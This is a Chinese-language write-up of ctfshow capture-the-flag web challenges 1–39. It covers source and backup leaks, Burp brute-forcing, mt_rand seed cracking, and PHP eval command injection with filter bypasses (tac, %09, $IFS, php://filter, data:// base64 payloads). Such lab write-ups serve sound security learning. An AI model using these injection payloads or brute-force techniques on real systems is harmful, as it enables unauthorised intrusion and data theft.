web1

直接查看源代码或F12检查即可看到flag

web2

右键无法打开源代码，F12无响应

在URL前加"view-source:"即可打开网页源代码

或ctrl+u直接打开

web3

F12检查 network F5刷新

或burtsuite抓包

web4

关于网站robots协议，看这篇就够了 - 知乎

robots文件是一个纯文本文件，也就是常见的.txt文件。

在URL后写入 robots.txt能看到flag文件的目录

再把flag文件的目录重新加到url后即可看到flag

web5

引用："备份文件
本题考查的是phps作为备份文件，泄露了源码
其他常见的有linux的备份文件，比如index.php.swp
还有www.zip等"

url后跟上/index.phps下载该文件，然后直接用浏览器打开即可

web6

引用:"网站备份压缩文件 漏洞成因

在网站的升级和维护过程中，通常需要对网站中的文件进行修改。此时就需要对网站整站或者其中某一页面进行备份。

当备份文件或者修改过程中的缓存文件因为各种原因而被留在网站 web 目录下，而该目录又没有设置访问权限时，便有可能导致备份文件或者编辑器的缓存文件被下载，导致敏感信息泄露，给服务器的安全埋下隐患。

该漏洞的成因主要有是管理员将备份文件放在到 web 服务器可以访问的目录下。

该漏洞往往会导致服务器整站源代码或者部分页面的源代码被下载，利用。源代码中所包含的各类敏感信息，如服务器数据库连接信息，服务器配置信息等会因此而泄露，造成巨大的损失。

被泄露的源代码还可能会被用于代码审计，进一步利用而对整个系统的安全埋下隐患。"

访问www.zip下载解压后得到一个txt文件和一个php文件

index.php内容如下

访问fl000g.txt即可得到flag

web7

什么是版本控制？为什么要有版本控制？常用的版本控制工具有哪些？_版本控制是什么意思-程序员宅基地

总结：Git是目前世界上最先进的分布式版本控制系统。

访问.git就可以直接重定向到.git/index.php

或者直接访问.git/index.php

web8

.git换成.svn

web9

1.robots.txt文件泄露，放在网站的跟目录下，用于限制浏览器的访问（哪些可以抓取，哪些不能抓取）用于防止黑客，但是任何人可在url中直接通过/robots.txt访问，导致网站结构被泄露。可对admin等重要文件设置密保保护，或者采取更换文件名的方法防御.

2.phps文件泄露，phps存放着php源码,可通过尝试访问/index.phps读取,或者尝试扫描工具扫描读取.

3..git文件泄露，当开发人员使用git控制版本时，如果操作不当，可能导致git流入线上环境，导致.git文件夹下的文件被访问，代码泄露，如.git/index文件可找到工程所有文件名和sha1文件,在git/objects下载导致危害

4.svn泄露，svn是源代码管理系统，在管理代码的过程中，会生成一个.svn的隐藏文件，导致源码泄露（造成原因是在发布代码时没有使用导入功能，而是直接粘贴复制）

5.vim缓存泄露，在使用vim进行编辑时，会产生缓存文件，操作正常，则会删除缓存文件，如果意外退出，缓存文件保留下来，这是时可以通过缓存文件来得到原文件，以index.php来说，第一次退出后，缓存文件名为 .index.php.swp，第二次退出后，缓存文件名为.index.php.swo,第三次退出后文件名为.index.php.swn

6.压缩文件也可能包含文件的源码等，注意rar zip后缀
————————————————
版权声明：本文为CSDN博主「伤心的小尾巴」的原创文章，遵循CC 4.0 BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/qq_59950255/article/details/121500183

这里考的是vim缓存泄露

• 第一次意外退出生成的是.swp
• 第二次意外退出生成的是.swo
• 第三次为.swn

因此可以尝试打开第一次退出时产生的这个文件,输入url/index.php.swp

下载打开文件得到flag

web10

提示cookie那就想办法看到网站cookie

F12 network F5刷新 能直接找到flag,urldecode之后得到flag

或者burpsuite抓包也能直接看到cookie

web11

阿里云网站运维检测平台

这样设置

至于nslookup -query=all flag.ctfshow.com

听大手子讲是因为环境崩了跑不出来

web12

用dirsearch查子域名，找到robots.txt（装dirsearch装了一晚上发现python安装的是exe）

访问robots.txt 里面有个/admin的目录

访问/admin 题目描述说是网上的公开信息就是管理员常用密码,猜测最开始网页底部的number为密码，用户名为admin，登录成功得到flag

web13

题目描述说技术文档里不要出现敏感信息

网页下划到最下面找到document，点击下载pdf,里面有后台网址和用户名密码

http://your-domain/system1103/login.php

your-domain 实际上指的是"你的域名"也就是在题目链接后加上/system1103/login.php

登录即可得到flag

web14

依旧是dirsearch起手，搜索到/editor路径，访问后进入编辑器，找到上传图片，图片空间或文件空间，遍历目录，var -> www -> html -> nothinghere -> fl000g.txt

访问url/nothinghere/fl000g.txt即可得到flag

web15

dirsearch搜索到/admin/index.php，访问后是一个登录界面，下面有个忘记密码，进入后提示密保内容为“我的所在地”，回到起始页底下找到一个QQ邮箱，搜索邮箱发现所在地为西安，输入后可以将密码重置，用户名猜测为admin，登录后得到flag

web16

什么是php探针，以及雅黑探针使用教程_雅黑php探针的作用-程序员宅基地

访问url/tz.php进入探针

点击PHPINFO进入后ctrl f 搜索ctfshow得到flag

web17

dirsearch直接能扫出来backup.sql,访问下载打开即可

web18

javascript游戏，查看网页源代码，再进入js文件，就算看不懂代码这一段也很可疑

unicode解码

访问110.php即可得到flag

web19

查看网页源代码可以找到如下内容

用户名为admin 密码是AES加密的字符，使用AES解密后登录得到flag

web20

dirsearch查询找到url/db/路径，再次查询url/db/路径找到url/db/db.mdb路径

访问下载打开找到flag或直接搜索flag字段

web21

参考WP ctf.show

简单爆破的原理和详细操作

1：前提条件：已知用户名是admin。

2：打开代理和Burp Suite，随便输入密码123尝试登陆同时利用Burp Suite抓包。

3：已知：Authorization请求头用于验证是否有从服务器访问所需数据的权限。

4：查看Authorization请求头观察发现是base64编码，进行解码。

5：解码发现格式为admin:123，可以进行爆破。爆破原理：利用多个payload（进攻指令），对返回数据进行对比分析，得到唯一不同的就是可能的密码。

6:已知：Burp Intruder功能是在原始请求数据的基础上通过修改各种请求参数，从而获取不同的请求应答。

7：将所抓包send to intruder，选择sniper模式。

8：已知：sniper模式是设置一个爆破点，利用多个payload重复攻击一个爆破点。

用右边的add按键设置爆破点

9：加载题目所给字典，设置前缀admin:（因为字典中只包含了密码），并对其进行base64编码（匹配Authorization请求头格式）

10：进行爆破，找到状态不同的即为正确答案。

按照status排序一下防止星际玩家

11：解码，登录，找到flag。

或者直接看响应

web22

环境烂了，做不了 仅存的WP ctf.show

360quake 使用空间搜索引擎--->360quake 搜索语法--->domain="ctf.show" 可以搜索出子域名--->vip.ctf.show 可以发现子域名vip.ctf.show下面有flag--->flag{ctf_show_web}

web23

需要获取token，复合题目给出的token条件，其实就是爆破

遍历数字，取MD5值，匹配条件

import hashlib

for i in range(1,10000):

    md5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if md5[1] != md5[14] or md5[14]!= md5[17]:
        continue


    if(ord(md5[1]))>=48 and ord(md5[1])<=57 and (ord(md5[31]))>=48 and ord(md5[31])<=57:

        if((int(md5[1])+int(md5[14])+int(md5[17]))/int(md5[1])==int(md5[31])):

            print(i)

web24

参考文章CTF_Web：php伪随机数mt_rand()函数+php_mt_seed工具使用_php伪随机数 github-程序员宅基地

大概意思就是mt_srand播种随机数生成器

mt_rand这个随机数生成器按照种子来生成随机数，也就是我们所谓的伪随机

只要知道了种子，就能固定生成某一个数

写PHP脚本如下，获得随机数为1155388967

访问URL/?1155388967即可

<?php
	mt_srand(372619038);
	echo intval(mt_rand())
?>

web25

掐头去尾没用的部分

这段脚本首先给mt_srand()传了一个种子

当rand是正数的时候

如果Cookie中token等于mt_rand()+mt_rand()输出flag

否则输出rand的值

所以当r等于0时，输出的rand就等于第一次生成的mt_rand

访问url/?r=0可以得到这个数值，每个人得到的数值不一样

我这次得到的是-316428822

利用工具php_mt_seed来逆推种子

工具下载地址：php_mt_seed - PHP mt_rand() seed cracker

Download 4.0版本，放进kali中解压

tar -zxvf php_mt_seed-4.0.tar.gz

进入解压出的文件夹中./php_mt_seed.c 

提示权限不足则输入命令:chmod 777 php_mt_seed.c 赋予权限

之后就可以使用了

第一次使用时候先输入make更新

然后输入time ./php_mt_seed rand值

运行完毕后会得到很多版本的种子值，通过bp抓包可以看到题目环境的php版本

选择对应版本的种子（我的是倒数第三个）

题目的脚本进行了三次mt_rand()操作，取后两次相加为token值，所以仿照题目写出脚本

<?php
    mt_srand(427308533);
    mt_rand();
    $token = mt_rand()+mt_rand();
    echo $token;
?>

运行后得到toke=1791014588

回到题目使用hackbar对题目传参

这样设置

web26

什么都不输直接点安装就能在bp中找到flag（题目的问题吧）

可以看到题目中提供了这么一些表单

点击开始安装后，对应的我们在请求包中找到了这些值，所以把这个包发到爆破模块

上面四个信息按照上面提示的填，只需要爆破密码就行

web27

考点在信息收集和日期爆破

登录需要输入学号和密码，点击录取名单可以获取到学生姓名和部分身份证号，中间的出生日期不知道

进入学院录取查询需要填写姓名和身份证号，那么我们只需要抓包爆破生日就行了

把payload type改成dates 下面的日期format要改成yyyyMMdd

找到长度不一样的结果查看返回包uudecode解码后得到学号信息

回到主界面用学号和身份证号登录得到flag

web28

目录爆破

环境打开发现什么都没有，原来是URL自动重定向到了url/0/1/2.txt目录

bp抓包后发到爆破项

攻击模式设定为cluster bomb

爆破点设置在两个目录上，删除最后的2.txt

payload设置为number

开始爆破，响应状态码为200的响应包中带有flag

web29

代码审计

eval函数可以执行php的其他函数

例如输入c=phpinfo();就能看到php版本信息等

首先利用eval函数的特性调用sysytem(ls);函数查看文件目录

url/?c=system(ls);

可以看到该目录下有flag.php 和 index.php两个文件

接下来就要想办法绕过"flag"这个关键词获取flag.php的内容

这里要用到通配符

c=system("cp fla?.php 1.txt");将flag.php中的内容复制到 1.txt中

然后直接访问url/1.txt即可

看wp有说直接c=system("cat fla?.php");的，但是我没成功

web30

跟上一题差不多，只不过这次把system php 也给禁用了

需要使用其他函数执行命令，可以参考这篇文章PHP执行系统命令的有几个常用的函数_PHP教程-php教程-PHP中文网

这里使用反点号

url/?c=echo(`cp%20fla*g.p?p%201.txt`);

web31

还是一样，只不过这次禁用的东西更多了

方法很多，这里只记录部分

?c=passthru("tac%09fla*"); tac绕过cat %09绕过空格 fla*绕过flag

?c=eval($_GET[1]);&1=passthru("tac%09fla*");嵌套eval()函数

?c=eval($_GET[1]);&1=passthru("tac\$IFS\$9fla*");$IFS$9绕过空格

?c=passthru("tac\$IFS\$9fla*")

?c=show_source(next(array_reverse(scandir(pos(localeconv())))));官方答案

localeconv可以返回包括小数点在内的一个数组；pos去取出数组中当前第一个元素，也就是小数点。 scandir可以结合它扫描当前目录内容。 ?c=print_r(scandir(pos(localeconv()))); 可以看到当前目录下有flag.php 通过array_reverse把数组逆序，通过next取到第二个数组元素，也即flag.php 

web32

一知半解 参考PHP 伪协议：使用 php://filter 为数据流应用过滤器_php:\//filter 无数字-程序员宅基地

/?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

大概是用include调用$_GET[1] 

配合php伪协议php://gileter读取flag.php

web33

几乎和上一题一样

直接用上一题的payload就能出

web34

还是一样

web35

还是

web36

ban掉了数字0-9，之前用的参数是1，改成别的就行，实际上没区别

web37

这题要用到data伪协议，格式是data://text/plain,脚本内容

除了除了"flag"几乎没有做出任何限制

?c=data://text/plain,<?php system("cat f*")?>

使用cat方法要右键查看网页源代码才能看到flag字符串

把cat换成tac就能直接在屏幕上看到flag字符串

如果ban掉了某些词可以使用base64加密后的脚本来进行绕过

data://text/plain;base64,base64加密后的脚本

?c=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4=

web38

增加了过滤条件，但经过base64加密后没区别，直接用上一题的payload

web39

代码中给$c强加了一个".php"后缀

这里可以尝试写入一个php.info()或者echo "111"; 试试

?c=data://text/plain,<?php%20echo%20"11111"?>

因为写入的脚本中包含?>，所以脚本已经闭合了，后面添加的".php“会直接输出在屏幕上，所以对我们命令执行没有影响，直接cat flag就好

,<?=system("tac fla*.php");?>

web40

明天写